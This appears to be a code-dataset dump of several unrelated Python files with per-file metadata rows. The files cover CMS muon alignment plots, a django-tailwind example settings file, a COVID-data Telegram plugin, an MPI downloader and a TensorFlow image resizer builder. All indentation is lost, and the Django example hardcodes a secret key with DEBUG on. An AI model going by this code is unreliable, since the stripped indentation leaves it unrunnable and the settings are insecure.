if len(gtemp_23_phi) > 0:
gtemp_23.Draw("p")
gtemp2_23.Draw("p")
if len(gtemp_34_phi) > 0:
gtemp_34.Draw("p")
gtemp2_34.Draw("p")
tlegend = ROOT.TLegend(0.5, 0.72, 0.9, 0.92)
tlegend.SetBorderSize(0)
tlegend.SetFillColor(ROOT.kWhite)
if len(gtemp_12_phi) > 0:
tlegend.AddEntry(gtemp_12, "MB1 - MB2 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_12_val), stdev(gtemp_12_val)), "pl")
if len(gtemp_23_phi) > 0:
tlegend.AddEntry(gtemp_23, "MB2 - MB3 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_23_val), stdev(gtemp_23_val)), "pl")
if len(gtemp_34_phi) > 0:
tlegend.AddEntry(gtemp_34, "MB3 - MB4 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_34_val), stdev(gtemp_34_val)), "pl")
if len(gtemp_12_phi) > 0:
tlegend.AddEntry(gtemp_12, "total mean: %4.2f, total RMS: %4.2f" % \
(mean(gtemp_12_val + gtemp_23_val + gtemp_34_val),
stdev(gtemp_12_val + gtemp_23_val + gtemp_34_val)), "")
tlegend.Draw()
##################################################################################
def segdiffvsphicsc(tfiles, component, pair, window=5., **args):
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.05)
if not component[0:3] == "csc": Exception
endcap = args["endcap"]
if endcap=="m":
endcapnum=2
endcapsign="-"
elif endcap=="p":
endcapnum=1
endcapsign="+"
else: raise Exception
station1 = int(str(pair)[0])
station2 = int(str(pair)[1])
if not station2-station1==1: raise Exception
rings = [1,2]
if station2==4: rings = [1]
global htemp, gtemp_1, gtemp2_1, gtemp_2, gtemp2_2, tlegend
htemp = ROOT.TH1F("htemp", "", 1, -pi*5./180., pi*(2.-5./180.))
gtemp_1_phi, gtemp_1_val, gtemp_1_err, gtemp_1_val2, gtemp_1_err2 = [], [], [], [], []
gtemp_2_phi, gtemp_2_val, gtemp_2_err, gtemp_2_val2, gtemp_2_err2 = [], [], [], [], []
for ring in rings:
chambers = xrange(1,37)
if ring == 1: chambers = xrange(1,19)
for chamber in chambers:
phi, val, err, val2, err2, fit1, fit2, fit3 = segdiff(tfiles, component, pair, endcap=endcap, ring=ring, chamber=chamber)
if fit1 and fit2 and fit3:
if ring==1:
gtemp_1_phi.append(phi)
gtemp_1_val.append(val)
gtemp_1_err.append(err)
gtemp_1_val2.append(val2)
gtemp_1_err2.append(err2)
if ring==2:
gtemp_2_phi.append(phi)
gtemp_2_val.append(val)
gtemp_2_err.append(err)
gtemp_2_val2.append(val2)
gtemp_2_err2.append(err2)
#print "len(gtemp_12_phi) ", len(gtemp_12_phi)
#print "len(gtemp_23_phi) ",len(gtemp_23_phi)
#print "len(gtemp_34_phi) ",len(gtemp_34_phi)
if len(gtemp_1_phi) > 0:
gtemp_1 = ROOT.TGraphErrors(len(gtemp_1_phi), array.array("d", gtemp_1_phi), array.array("d", gtemp_1_val),
array.array("d", [0.] * len(gtemp_1_phi)), array.array("d", gtemp_1_err))
gtemp2_1 = ROOT.TGraphErrors(len(gtemp_1_phi), array.array("d", gtemp_1_phi), array.array("d", gtemp_1_val2),
array.array("d", [0.] * len(gtemp_1_phi)), array.array("d", gtemp_1_err2))
if len(gtemp_2_phi) > 0:
gtemp_2 = ROOT.TGraphErrors(len(gtemp_2_phi), array.array("d", gtemp_2_phi), array.array("d", gtemp_2_val),
array.array("d", [0.] * len(gtemp_2_phi)), array.array("d", gtemp_2_err))
gtemp2_2 = ROOT.TGraphErrors(len(gtemp_2_phi), array.array("d", gtemp_2_phi), array.array("d", gtemp_2_val2),
array.array("d", [0.] * len(gtemp_2_phi)), array.array("d", gtemp_2_err2))
if len(gtemp_1_phi) > 0:
gtemp_1.SetMarkerStyle(20); gtemp_1.SetMarkerSize(1.);
gtemp_1.SetMarkerColor(ROOT.kBlue); gtemp_1.SetLineColor(ROOT.kBlue)
gtemp2_1.SetMarkerStyle(24); gtemp2_1.SetMarkerSize(1.);
gtemp2_1.SetMarkerColor(ROOT.kBlue); gtemp2_1.SetLineColor(ROOT.kBlue)
if len(gtemp_2_phi) > 0:
gtemp_2.SetMarkerStyle(21); gtemp_2.SetMarkerSize(1.);
gtemp_2.SetMarkerColor(ROOT.kRed); gtemp_2.SetLineColor(ROOT.kRed)
gtemp2_2.SetMarkerStyle(25); gtemp2_2.SetMarkerSize(1.);
gtemp2_2.SetMarkerColor(ROOT.kRed); gtemp2_2.SetLineColor(ROOT.kRed)
htemp.SetTitle("ME%s%d - ME%s%d" % (endcapsign,station2,endcapsign,station1))
htemp.SetAxisRange(-window, window, "Y")
htemp.SetXTitle("Average #phi of pair (rad)")
if component == "csc_resid": htemp.SetYTitle("#Delta(r#phi)^{local} (mm)")
if component == "csc_slope": htemp.SetYTitle("#Deltad(r#phi)/dz^{local} (mrad)")
htemp.GetXaxis().CenterTitle()
htemp.GetYaxis().CenterTitle()
htemp.GetYaxis().SetTitleOffset(0.75)
c1.Clear()
htemp.Draw()
if len(gtemp_1_phi) > 0:
gtemp_1.Draw("p")
gtemp2_1.Draw("p")
if len(gtemp_2_phi) > 0:
gtemp_2.Draw("p")
gtemp2_2.Draw("p")
tlegend = ROOT.TLegend(0.5, 0.72, 0.9, 0.92)
tlegend.SetBorderSize(0)
tlegend.SetFillColor(ROOT.kWhite)
if len(gtemp_1_phi) > 0:
tlegend.AddEntry(gtemp_1, "ring 1 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_1_val), stdev(gtemp_1_val)), "pl")
if len(gtemp_2_phi) > 0:
tlegend.AddEntry(gtemp_2, "ring 2 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_2_val), stdev(gtemp_2_val)), "pl")
#if len(gtemp_12_phi) > 0:
# tlegend.AddEntry(gtemp_12, "total mean: %4.2f, total RMS: %4.2f" % \
# (mean(gtemp_12_val + gtemp_23_val + gtemp_34_val),
# stdev(gtemp_12_val + gtemp_23_val + gtemp_34_val)), "")
tlegend.Draw()
##################################################################################
# makes a scatterplot of corrections coming either from reports (if xml geometries are None)
# or from geometryX and geometryY (WRT the common initial geometry0)
def corrections2D(reportsX=None, reportsY=None, geometry0=None, geometryX=None, geometryY=None,
window=25., selection=None, name="tmp", canvas=None, pre_title_x=None, pre_title_y=None,
which="110011"):
tdrStyle.SetOptStat(0)
tdrStyle.SetStatW(0.40)
# determine what are we plotting: report vs report or xml vs xml
mode = None
check_reports = False
if reportsX is not None and reportsY is not None:
mode = "reports"
check_reports = True
if geometry0 is not None and geometryX is not None and geometryY is not None:
mode = "xmls"
if mode is None:
print "Either couple of reports or three geometries have to be given as input. Exiting..."
return
# setup ranges with the maximum [-window,window] that later will be optimized to [-wnd_adaptive,wnd_adaptive]
wnd = [window]*6
wnd_adaptive = [.1]*6
global hx, hy, hz, hphix, hphiy, hphiz
bins=2000
hx = ROOT.TH2F("%s_x" % name, "", bins, -wnd[0], wnd[0], bins, -wnd[0], wnd[0])
hy = ROOT.TH2F("%s_y" % name, "", bins, -wnd[1], wnd[1], bins, -wnd[1], wnd[1])
hz = ROOT.TH2F("%s_z" % name, "", bins, -wnd[2], wnd[2], bins, -wnd[2], wnd[2])
hphix = ROOT.TH2F("%s_phix" % name, "", bins, -wnd[3], wnd[3], bins, -wnd[3], wnd[3])
hphiy = ROOT.TH2F("%s_phiy" % name, "", bins, -wnd[4], wnd[4], bins, -wnd[4], wnd[4])
hphiz = ROOT.TH2F("%s_phiz" % name, "", bins, -wnd[5], wnd[5], bins, -wnd[5], wnd[5])
hhh = [hx, hy, hz, hphix, hphiy, hphiz]
# initialize PCA objects
global pca_x, pca_y, pca_z, pca_phix, pca_phiy, pca_phiz
pca_x = ROOT.TPrincipal(2,"D")
pca_y = ROOT.TPrincipal(2,"D")
pca_z = ROOT.TPrincipal(2,"D")
pca_phix = ROOT.TPrincipal(2,"D")
pca_phiy = ROOT.TPrincipal(2,"D")
pca_phiz = ROOT.TPrincipal(2,"D")
pcas = [pca_x, pca_y, pca_z, pca_phix, pca_phiy, pca_phiz]
# arrays to later fill graphs with
ax=[]; ay=[]; az=[]; aphix=[]; aphiy=[]; aphiz=[]
aaa = [ax, ay, az, aphix, aphiy, aphiz]
# list of postal addresses
postal_addresses = []
# if reports are given, use them to fill addresses and do extra checks
if check_reports:
for r1 in reportsX:
# skip ME1/a
if r1.postal_address[0]=='CSC' and r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
r2 = getReportByPostalAddress(r1.postal_address, reportsY)
if r2 is None:
print "bad r2 in ",r1.postal_address
continue
if r1.status != "PASS" or r2.status != "PASS":
print "bad status", r1.postal_address, r1.status, r2.status
continue
postal_addresses.append(r1.postal_address)
# otherwise, use chamber addresses from xmls
else:
for key in geometry0.dt.keys():
if len(key)==3 and key in geometryX.dt and key in geometryY.dt:
postal_addresses.append( tuple(['DT'] + list(key)) )
for key in geometry0.csc.keys():
# skip ME1/a
if key[2]==1 and key[3]==4: continue
if len(key)==4 and key in geometryX.csc and key in geometryY.csc:
postal_addresses.append( tuple(['CSC'] + list(key)) )
# fill the values
for addr in postal_addresses:
# checks the selection function
if not (selection is None or (selection.__code__.co_argcount == len(addr) and selection(*addr)) ): continue
factors = [10. * signConventions[addr][0], 10. * signConventions[addr][1], 10. * signConventions[addr][2],
1000., 1000., 1000. ]
if check_reports:
rX = getReportByPostalAddress(addr, reportsX)
rY = getReportByPostalAddress(addr, reportsY)
deltasX = [rX.deltax, rX.deltay, rX.deltaz, rX.deltaphix, rX.deltaphiy, rX.deltaphiz]
deltasY = [rY.deltax, rY.deltay, rY.deltaz, rY.deltaphix, rY.deltaphiy, rY.deltaphiz]
if mode == "reports":
checks = map( lambda d1, d2: d1 is not None and d2 is not None and d1.error is not None \
and d2.error is not None and (d1.error**2 + d2.error**2) > 0. , \
deltasX, deltasY)
for i in range(len(checks)):
if not checks[i]: continue
fillX = deltasX[i].value * factors[i]
fillY = deltasY[i].value * factors[i]
aaa[i].append([fillX,fillY])
pcas[i].AddRow(array.array('d',[fillX,fillY]))
mx = max(abs(fillX), abs(fillY))
if mx > wnd_adaptive[i]: wnd_adaptive[i] = mx
if mode == "xmls":
db0 = dbX = dbY = None
if addr[0] == "DT":
db0, dbX, dbY = geometry0.dt[addr[1:]], geometryX.dt[addr[1:]], geometryY.dt[addr[1:]]
if addr[0] == 'CSC':
db0, dbX, dbY = geometry0.csc[addr[1:]], geometryX.csc[addr[1:]], geometryY.csc[addr[1:]]
checks = [True]*6
if check_reports:
checks = map( lambda d1, d2: d1 is not None and d2 is not None , deltasX, deltasY)
gdeltas0 = [db0.x, db0.y, db0.z, db0.phix, db0.phiy, db0.phiz]
gdeltasX = [dbX.x, dbX.y, dbX.z, dbX.phix, dbX.phiy, dbX.phiz]
gdeltasY = [dbY.x, dbY.y, dbY.z, dbY.phix, dbY.phiy, dbY.phiz]
for i in range(len(checks)):
if not checks[i]: continue
fillX = (gdeltasX[i] - gdeltas0[i]) * factors[i]
fillY = (gdeltasY[i] - gdeltas0[i]) * factors[i]
aaa[i].append([fillX,fillY])
pcas[i].AddRow(array.array('d',[fillX,fillY]))
mx = max(abs(fillX), abs(fillY))
if mx > wnd_adaptive[i]: wnd_adaptive[i] = mx
#if addr[0] == 'CSC' and i==1 and (abs(fillX)>0.01 or abs(fillY)>0.01): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
#if addr[0] == 'CSC' and i==2 and (abs(fillX)>0.02 or abs(fillY)>0.02): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
#if addr[0] == 'CSC' and i==3 and (abs(fillX)>0.05 or abs(fillY)>0.05): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
if mode == "xmls":
if pre_title_x is None: pre_title_x = "geometry 1 "
if pre_title_y is None: pre_title_y = "geometry 2 "
if mode == "reports":
if pre_title_x is None: pre_title_x = "iteration's "
if pre_title_y is None: pre_title_y = "other iteration's "
tmptitles = ["#Deltax (mm)", "#Deltay (mm)", "#Deltaz (mm)",
"#Delta#phi_{x} (mrad)", "#Delta#phi_{y} (mrad)", "#Delta#phi_{z} (mrad)"]
htitles = []
for t in tmptitles: htitles.append([pre_title_x + t, pre_title_y + t])
if canvas is not None: c = canvas
else: c = c1
c.Clear()
ndraw = which.count('1')
if ndraw > 4: c.Divide(3, 2)
elif ndraw > 2: c.Divide(2, 2)
elif ndraw > 1: c.Divide(2, 1)
global lines, graphs, texs
lines = []; graphs = []; texs = []
ipad = 0
for i in range(6):
# decode 'which' binary mask
if ( int(which,2) & (1<<i) ) == 0: continue
ipad += 1
c.GetPad(ipad).cd()
c.GetPad(ipad).SetGridx(1)
c.GetPad(ipad).SetGridy(1)
wn = 1.08 * wnd_adaptive[i]
hhh[i].GetXaxis().SetRangeUser(-wn, wn)
hhh[i].GetYaxis().SetRangeUser(-wn, wn)
hhh[i].SetXTitle(htitles[i][0])
hhh[i].SetYTitle(htitles[i][1])
hhh[i].GetXaxis().CenterTitle()
hhh[i].GetYaxis().CenterTitle()
hhh[i].Draw()
if len(aaa[i]) == 0: continue
a1, a2 = map( lambda x: array.array('d',x), list(zip(*aaa[i])) )
g = ROOT.TGraph(len(a1), a1, a2)
g.SetMarkerStyle(5)
g.SetMarkerSize(0.3)
g.SetMarkerColor(ROOT.kBlue)
graphs.append(g)
pcas[i].MakePrincipals()
#pcas[i].Print()
#pcas[i].MakeHistograms()
b = pcas[i].GetEigenVectors()(1,0) / pcas[i].GetEigenVectors()(0,0)
a = pcas[i].GetMeanValues()[1] - b * pcas[i].GetMeanValues()[0]
#print a, b, " ", pcas[i].GetEigenValues()[0], pcas[i].GetEigenValues()[1]
cov = pcas[i].GetCovarianceMatrix()
r = cov(0,1)/sqrt(cov(1,1)*cov(0,0))
print "r, RMSx, RMSy =", r, g.GetRMS(1), g.GetRMS(2)
texrms = ROOT.TLatex(0.17,0.87, "RMS x,y = %.02g, %.02g" % (g.GetRMS(1),g.GetRMS(2)))
texr = ROOT.TLatex(0.17,0.80, "r = %.02g" % r)
for t in texr, texrms:
t.SetNDC(1)
t.SetTextColor(ROOT.kBlue)
t.SetTextSize(0.053)
t.Draw()
texs.append(t)
g.Draw("p")
if not isnan(b):
wn = wnd_adaptive[i]
line = ROOT.TLine(-wn, a - b*wn, wn, a + b*wn)
line.SetLineColor(ROOT.kRed)
line.Draw()
lines.append(line)
#return hx, hy, hphiy, hphiz, pca_x, pca_y, pca_phiy, pca_phiz
return aaa
| 43.389272
| 186
| 0.597403
|
794af3a243e810510df3eb27651da685b22f971a
| 2,739
|
py
|
Python
|
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | null | null | null |
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | null | null | null |
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | 1
|
2021-05-18T11:39:51.000Z
|
2021-05-18T11:39:51.000Z
|
"""
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import socket
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "7c@h1io9=5@8m%fqlyvnx&!x0zm556-g@+dpvu4ab+tsjkm@vm"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
INTERNAL_IPS = [
"127.0.0.1",
]
# Gets internal IP address for a Docker container
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
# Application definition
INSTALLED_APPS = ["django.contrib.staticfiles", "tailwind", "theme"]
TAILWIND_APP_NAME = "theme"
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
],
},
},
]
WSGI_APPLICATION = "project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "staticfiles"
| 25.361111
| 91
| 0.705732
|
794af414e8614b53793bd3625ec3cdbe17d77dea
| 446
|
py
|
Python
|
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | null | null | null |
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | 4
|
2019-11-05T19:36:30.000Z
|
2019-11-19T19:48:08.000Z
|
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | null | null | null |
import os
API_ENDPOINT = "https://racweb.herokuapp.com/raspberry/1/arduino"
DEVICES_ENDPOINT = "{}/".format(API_ENDPOINT)
SLOTS_ENDPOINT = "{}/{{}}/slots/".format(API_ENDPOINT)
PLANTS_ENDPOINT = "https://docs.google.com/spreadsheets/d/e/2PACX-1vT-KbxCsv32_6xZfwCi-KQEUeVskm4cAomqczfHPWIYL-3Nj3D9aawaH6yPFohSzvkJaaU9VSjifk1P/pub?gid=590649384&single=true&output=csv"
DB_PATH = "./database/db/"
RASPBERRY_ID = os.environ.get("RASPBERRY_ID", "1")
| 44.6
| 188
| 0.780269
|
794af416809ea9adb51da62a9dae441380de3f08
| 79
|
py
|
Python
|
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
list1=[2,1,5,8,6,7,4]
#list1=['anak','cantik','baik']
list1.sort()
print(list1)
| 19.75
| 31
| 0.632911
|
794af44fe42f71d32e49e1e79f2dd0684a694cf7
| 3,636
|
py
|
Python
|
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
""" https://github.com/Zeta-qixi/nonebot-plugin-covid19-news """
import json
from typing import Dict
from pagermaid.listener import listener
from pagermaid.utils import alias_command, obtain_message, get
POLICY_ID = {}
class Area:
def __init__(self, data):
self.name = data['name']
self.today = data['today']
self.total = data['total']
self.grade = data['total'].get('grade', '风险未确认')
self.children = data.get('children', None)
@property
async def policy(self):
return await get_policy(POLICY_ID.get(self.name))
@property
def main_info(self):
return f"**{self.name} 新冠肺炎疫情情况** ({self.grade})\n\n" \
f"`😔新增确诊:{self.today['confirm']}`\n" \
f"`☢️现存确诊:{self.total['nowConfirm']}`"
class AreaList(Dict):
def add(self, data):
self[data.name] = data
class NewsData:
def __init__(self):
self.data = {}
self.time = ''
self.update_data()
async def update_data(self):
url = "https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5"
res = (await get(url)).json()
if res['ret'] != 0:
return
data = json.loads(res['data'])
if data['lastUpdateTime'] != self.time:
self.time = data['lastUpdateTime']
self.data = AreaList()
def get_Data(data_):
if isinstance(data_, list):
for i in data_:
get_Data(i)
if isinstance(data_, dict):
area_ = data_.get('children')
if area_:
get_Data(area_)
self.data.add(Area(data_)) # noqa
get_Data(data['areaTree'][0])
return
async def set_pid():
url_city_list = 'https://r.inews.qq.com/api/trackmap/citylist?'
resp = await get(url_city_list)
res = resp.json()
for province in res['result']:
cities = province.get('list')
if cities:
for city in cities:
cid = city['id']
name = city['name']
POLICY_ID[name] = cid
async def get_policy(uid):
url_get_policy = f"https://r.inews.qq.com/api/trackmap/citypolicy?&city_id={uid}"
resp = await get(url_get_policy)
res_ = resp.json()
if res_['message'] != 'success':
return "数据获取失败!"
try:
data = res_['result']['data'][0]
except IndexError:
return "暂无政策信息"
# data['leave_policy_date']
# data['leave_policy']
# data['back_policy_date']
# data['back_policy']
# data['poi_list'] # 风险区域
msg = f"出行({data['leave_policy_date']})\n{data['leave_policy']}\n\
------\n\
进入({data['back_policy_date']})\n{data['back_policy']}"
return msg
NewsBot = NewsData()
@listener(is_plugin=True, outgoing=True, command=alias_command("covid"),
description="获取新冠疫情信息。",
parameters="<地区>")
async def covid_info(context):
global POLICY_ID, NewsBot
await context.edit("正在获取中。。。")
if not POLICY_ID:
await set_pid()
await NewsBot.update_data()
try:
city = await obtain_message(context)
except ValueError:
return await context.edit("[covid] 无法获取城市名!")
zc = False
if city.find("政策") != -1:
zc = True
city = city.replace("政策", "")
city = NewsBot.data.get(city)
if city:
policy = "Tips: 查询出行政策可加上 `政策`"
if zc:
policy = await city.policy
await context.edit(f"{city.main_info}\n\n{policy}")
else:
await context.edit("[covid] 只限查询国内城市或你地理没学好。")
| 25.787234
| 85
| 0.561606
|
794af5133b3b32f453701b69f894e34471ee6a15
| 3,039
|
py
|
Python
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 140
|
2017-02-21T22:49:04.000Z
|
2022-03-22T17:51:58.000Z
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 5
|
2017-12-02T19:55:00.000Z
|
2021-09-22T23:18:39.000Z
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 79
|
2017-01-25T10:53:33.000Z
|
2022-03-11T16:13:57.000Z
|
#!/usr/bin/env python2
#
# https://pythonhosted.org/mpi4py/usrman/tutorial.html
#
# mpiexec -n 5 python test-mpi.py
#
import requests
from mpi4py import MPI
# --- functions ---
def build_ranges(value, numsplits, rank):
print '[RANK: %d ] build_ranges: %s/%s' % (rank, value, numsplits)
ranges = []
for i in range(numsplits):
if i == 0:
start = i
else:
start = int(round(1 + i * value/(numsplits*1.0), 0))
end = int(round(1 + i * value/(numsplits*1.0) + value/(numsplits*1.0)-1, 0))
ranges.append((start, end))
return ranges
def get_file_data(url, data_range, rank):
print '[RANK: %d ] get_file_data: %s' % (rank, data_range)
response = requests.get(url, headers={'Range': 'bytes=%s-%s' % data_range})
data = response.content
return data
def merge(filename, data, data_range, rank):
offset, end = data_range
print '[RANK: %d ] merge: %s-%s' % (rank, offset, end)
fh = MPI.File.Open(comm, filename, amode)
fh.Write_at_all(offset, data)
fh.Close()
# --- main ---
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
numr = comm.Get_size()
amode = MPI.MODE_WRONLY|MPI.MODE_CREATE
print '[RANK: %d ] starting: %d/%d' % (rank, rank, numr)
# ---------------------------------------------------------------------
# --- doesn't work ---
#url = 'http://2u.fileshare.ro/download/3172391991/JerryCo+Feat.+Sanziana+Niculae+-+Esti+Tot+Ce+Am+%28+Original+Radio+Edit+%29+%5B+AlegeMuzica.Info+%5D.mp3'
# --- works ---
url = 'http://greenteapress.com/thinkpython/thinkpython.pdf'
#url = 'http://www25.zippyshare.com/d/RTtv9Zv1/30183/Andra%20feat.%20David%20Bisbal%20-%20Without%20You%20%40%20PeMuzica.Com.mp3'
#url = 'http://broadcast.lds.org/churchmusic/MP3/1/2/nowords/271.mp3'
filename = url.split('/')[-1]
# - different proceses -
if rank == 0:
if not url:
print "Please Enter some url to begin download."
# - get file size -
response = requests.head(url, headers={'Accept-Encoding': 'identity'})
size_in_bytes = response.headers.get('content-length', None)
print '[RANK: %d ] %s bytes to download.' % (rank, size_in_bytes)
if not size_in_bytes:
print "Size cannot be determined."
exit()
# - generate ranges -
byte_ranges = build_ranges(int(size_in_bytes), numr, rank)
print '[RANK: %d ] byte_ranges: %s' % (rank, byte_ranges)
# - send ranges -
for itm in range(1, len(byte_ranges)):
req = comm.isend(byte_ranges[itm], dest=itm, tag=itm)
req.wait()
# - "receive" range -
data_range = byte_ranges[0]
else:
# - receive range -
req = comm.irecv(source=0, tag=rank)
data_range = req.wait()
# - all processes -
print '[RANK: %d ] data_range: %s' % (rank, data_range)
# - download -
data = get_file_data(url, data_range, rank)
# - merge -
merge(filename, data, data_range, rank)
# - end -
print '[RANK: %d ] ending: %d/%d' % (rank, rank, numr)
| 23.742188
| 156
| 0.59921
|
794af688c647cb59d5333110d5d2f8b0eb9b6295
| 7,715
|
py
|
Python
|
research/object_detection/builders/image_resizer_builder.py
|
pdharma01/models
|
063091d2a9fb2071f15b0921bed888d86833c4f1
|
[
"Apache-2.0"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
object_detection_api/builders/image_resizer_builder.py
|
HuaxingXu/marine_debris_ML
|
9b7317c0ad881849ce5688aeb1eb368dfb85d39f
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
object_detection_api/builders/image_resizer_builder.py
|
HuaxingXu/marine_debris_ML
|
9b7317c0ad881849ce5688aeb1eb368dfb85d39f
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builder function for image resizing operations."""
import functools
import tensorflow as tf
from object_detection.core import preprocessor
from object_detection.protos import image_resizer_pb2
def _tf_resize_method(resize_method):
"""Maps image resize method from enumeration type to TensorFlow.
Args:
resize_method: The resize_method attribute of keep_aspect_ratio_resizer or
fixed_shape_resizer.
Returns:
method: The corresponding TensorFlow ResizeMethod.
Raises:
ValueError: if `resize_method` is of unknown type.
"""
dict_method = {
image_resizer_pb2.BILINEAR:
tf.image.ResizeMethod.BILINEAR,
image_resizer_pb2.NEAREST_NEIGHBOR:
tf.image.ResizeMethod.NEAREST_NEIGHBOR,
image_resizer_pb2.BICUBIC:
tf.image.ResizeMethod.BICUBIC,
image_resizer_pb2.AREA:
tf.image.ResizeMethod.AREA
}
if resize_method in dict_method:
return dict_method[resize_method]
else:
raise ValueError('Unknown resize_method')
def build(image_resizer_config):
"""Builds callable for image resizing operations.
Args:
image_resizer_config: image_resizer.proto object containing parameters for
an image resizing operation.
Returns:
image_resizer_fn: Callable for image resizing. This callable always takes
a rank-3 image tensor (corresponding to a single image) and returns a
rank-3 image tensor, possibly with new spatial dimensions.
Raises:
ValueError: if `image_resizer_config` is of incorrect type.
ValueError: if `image_resizer_config.image_resizer_oneof` is of expected
type.
ValueError: if min_dimension > max_dimension when keep_aspect_ratio_resizer
is used.
"""
if not isinstance(image_resizer_config, image_resizer_pb2.ImageResizer):
raise ValueError('image_resizer_config not of type '
'image_resizer_pb2.ImageResizer.')
image_resizer_oneof = image_resizer_config.WhichOneof('image_resizer_oneof')
if image_resizer_oneof == 'keep_aspect_ratio_resizer':
keep_aspect_ratio_config = image_resizer_config.keep_aspect_ratio_resizer
if not (keep_aspect_ratio_config.min_dimension <=
keep_aspect_ratio_config.max_dimension):
raise ValueError('min_dimension > max_dimension')
method = _tf_resize_method(keep_aspect_ratio_config.resize_method)
per_channel_pad_value = (0, 0, 0)
if keep_aspect_ratio_config.per_channel_pad_value:
per_channel_pad_value = tuple(keep_aspect_ratio_config.
per_channel_pad_value)
image_resizer_fn = functools.partial(
preprocessor.resize_to_range,
min_dimension=keep_aspect_ratio_config.min_dimension,
